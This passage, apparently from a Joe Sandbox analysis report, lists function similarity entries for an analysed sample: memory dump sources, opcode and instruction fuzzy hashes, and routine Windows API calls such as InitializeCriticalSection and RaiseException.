                          • Instruction Fuzzy Hash: 46F01221F3C55682F751B760E455B7AA391FFE6B06F481031F54EC1994EE2DE549C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: CreateFrameInfo__except_validate_context_recordabort
                          • String ID: csm
                          • API String ID: 2466640111-1018135373
                          • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                          • Instruction ID: 13229203a3b1ec62068bfa800fa41aa7232faf6fa09d1594881fbb64f822ed9f
                          • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                          • Instruction Fuzzy Hash: 1F515E72A1C78287D661BF16E45026EB7A4FB8AB90F140134EF8D87B55EF38E450CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ObjectRelease
                          • String ID:
                          • API String ID: 1429681911-3916222277
                          • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                          • Instruction ID: a17053831ab5985ca4e7d2b396e02726ed1114802680144c9dec6e5f975c5ae3
                          • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                          • Instruction Fuzzy Hash: 29314D75A0C75286EB04EF13B81862AB7A0F78AFD1F504835ED4A93B54DE3DE449CB00
                          APIs
                          • InitializeCriticalSection.KERNEL32(?,?,?,00007FF64D34317F,?,?,00001000,00007FF64D32E51D), ref: 00007FF64D33E8BB
                          • CreateSemaphoreW.KERNEL32(?,?,?,00007FF64D34317F,?,?,00001000,00007FF64D32E51D), ref: 00007FF64D33E8CB
                          • CreateEventW.KERNEL32(?,?,?,00007FF64D34317F,?,?,00001000,00007FF64D32E51D), ref: 00007FF64D33E8E4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                          • String ID: Thread pool initialization failed.
                          • API String ID: 3340455307-2182114853
                          • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                          • Instruction ID: eca2f21293b1475b83d085ab22214c5d449e60b2cb0f5ff80a89fa8c43bdb6f4
                          • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                          • Instruction Fuzzy Hash: 9A21D232E1D64187F752BF24D4447AD72E2EB89B0CF188134CA0D8A695EF7E9845C780
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: CapsDeviceRelease
                          • String ID:
                          • API String ID: 127614599-3916222277
                          • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                          • Instruction ID: 10910ecc888357227e6f4b0744b417ccd3cbc78f22f5e4b07bc98faccc7e4138
                          • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                          • Instruction Fuzzy Hash: 03E0C220F0C64282FF0877B6B58903AA2A1AB4DBD0F158435EA1FC3794EE3DC4C44300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ErrorLast
                          • String ID:
                          • API String ID: 1452528299-0
                          • Opcode ID: e740716fb16c43b695f5f219d8f3a9084bf63b213528ce6e7a445183d4fb0460
                          • Instruction ID: ef53c6b864b26565abec02cbd865316e54b058a8772cda29a953249106af5c5e
                          • Opcode Fuzzy Hash: e740716fb16c43b695f5f219d8f3a9084bf63b213528ce6e7a445183d4fb0460
                          • Instruction Fuzzy Hash: 7F51B072F18A4695FB01BB64D4452ECA361EB8ABD8F404232DA5C97BDAFE2CD544C340
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                          • String ID:
                          • API String ID: 1077098981-0
                          • Opcode ID: b863cc91c4db730fc30b640aae8101ad1aab9759ecbd7d6557df89d0553ffb74
                          • Instruction ID: e82647b3626504796c2977fc2872b1f837ed80a7474eef60a2394f1bd72f571b
                          • Opcode Fuzzy Hash: b863cc91c4db730fc30b640aae8101ad1aab9759ecbd7d6557df89d0553ffb74
                          • Instruction Fuzzy Hash: 32518332A1CB8286E751EF21E44436EB3B4FB86B88F501039EA4D97A54EF3DD504CB40
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                          • Instruction ID: baed0ff54d9a1a9dcedf25346995f3a2dc735663f0327accd486a75aa486072f
                          • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                          • Instruction Fuzzy Hash: 77E012A0E0D70282FF1A7B726859136A1E1AF4A742F488439E81FD7350FE3DE085C710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_snwprintf
                          • String ID: $%s$@%s
                          • API String ID: 2650857296-834177443
                          • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                          • Instruction ID: 0e603f56bc4279ae17722c5bf4e1e32a375b9ccce08c838110220f68e9cd7dd6
                          • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                          • Instruction Fuzzy Hash: 9631CF72F1DA4686EA22BF26E5402A9A3A0AB47788F401032DE0D97F95FE3CE515C700
                          APIs
                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF64D351D3E), ref: 00007FF64D3540BC
                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF64D351D3E), ref: 00007FF64D354102
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                          • Instruction ID: d970ab6db78b3e39bfa24e85686227f58e18a15c6b514ba91c9b698a71ebdc87
                          • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                          • Instruction Fuzzy Hash: EA112B32A08B4182EB66AB15E440269B7A1FB89B94F284231DF8D47754EF3CD555C700